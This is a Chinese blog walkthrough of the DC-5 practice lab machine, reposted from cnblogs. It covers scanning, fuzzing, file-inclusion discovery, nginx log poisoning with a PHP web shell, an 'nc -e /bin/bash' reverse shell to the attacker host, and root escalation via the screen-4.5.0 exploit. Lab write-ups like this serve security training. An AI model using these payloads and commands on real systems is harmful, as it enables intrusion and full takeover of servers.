码迷,mamicode.com
首页 > 其他好文 > 详细

DC-5靶机

时间:2020-05-07 20:04:00      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:技术   远程文件   编译   出现   一句话   tmp   ldl   ade   err   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-5.zip

一、主机扫描

arp-scan -l

nmap -p 1-65535 -A  -sV 192.168.17.131

技术图片

二、信息收集

技术图片
技术图片
技术图片
技术图片

dirb http://192.168.17.131 /usr/share/wordlists/dirb/big.txt

技术图片

用kali自带工具wfuzz(自带字典)扫描文件

cd /usr/share/wordlists/wfuzz/general

wfuzz -w /usr/share/wordlists/wfuzz/general/test.txt http://192.168.17.131/FUZZ.php

技术图片

三、漏洞利用

技术图片
技术图片

利用文件包含

技术图片
技术图片

远程文件包含

技术图片
技术图片

 

技术图片

日志

http://192.168.25.135/thankyou.php?file=/var/log/nginx/access.log 

http://192.168.17.131/thankyou.php?file=/var/log/nginx/error.log 

技术图片
技术图片
技术图片

重置靶机 ip 换为http://192.168.17.132

写入一句话

GET <?php system($_GET[‘cmd‘]); ?> HTTP/1.1

技术图片
技术图片

http://192.168.17.132/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.17.129 8888

root@kali:~/桌面# nc -lvvp 8888

技术图片

或者使用

GET /thankyou.php?file=<?php @eval($_REQUEST[cmd]);?> HTTP/1.1

技术图片
技术图片
技术图片
技术图片

python -c ‘import pty;pty.spawn("/bin/bash")‘

技术图片

查找www-data用户具有suid权限的命令

find / -perm -4000 2>/dev/null

技术图片

发现命令   /bin/screen-4.5.0

技术图片
技术图片

根据内容进行编译 直接上传出现问题,在kali编译在蚁剑上传

root@kali:/tmp# vi libhax.c

root@kali:/tmp# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

root@kali:/tmp# rm -f /tmp/libhax.c

root@kali:/tmp# vi rootshell.c

root@kali:/tmp# gcc -o /tmp/rootshell /tmp/rootshell.c

root@kali:/tmp# rm -f /tmp/rootshell.c

技术图片

蚁剑上传

技术图片

或者使用

scp root@192.168.17.129:/tmp/libhax.so /tmp/

scp root@192.168.17.129:/tmp/rootshell /tmp/

继续按照脚本

技术图片

将41154.sh中剩下部分代码另存为dc5.sh脚本文件

并在保存dc5.sh文件输入:set ff=unix ,否则在执行脚本文件时后出错

技术图片
技术图片

www-data@dc-5:/tmp$ chmod+x toroot.sh

www-data@dc-5:/tmp$./toroot.sh

DC-5靶机

标签:技术   远程文件   编译   出现   一句话   tmp   ldl   ade   err   

原文地址:https://www.cnblogs.com/bingtang123/p/12838415.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!